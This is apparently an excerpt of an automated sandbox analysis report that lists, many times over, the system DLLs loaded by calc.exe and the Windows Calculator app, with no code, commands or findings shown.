      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinui.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\calc.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vccorlib140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: msvcp140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: concrt140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: msvcp140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: vcruntime140_app.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.xaml.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.datatransfer.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rometadata.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositorycore.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windowmanagementapi.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: inputhost.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: mrmcorer.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d3d10warp.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dxcore.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: d2d1.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: dwrite.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.applicationmodel.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: uiamanager.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeSection loaded: windows.ui.immersive.dllJump to behavior
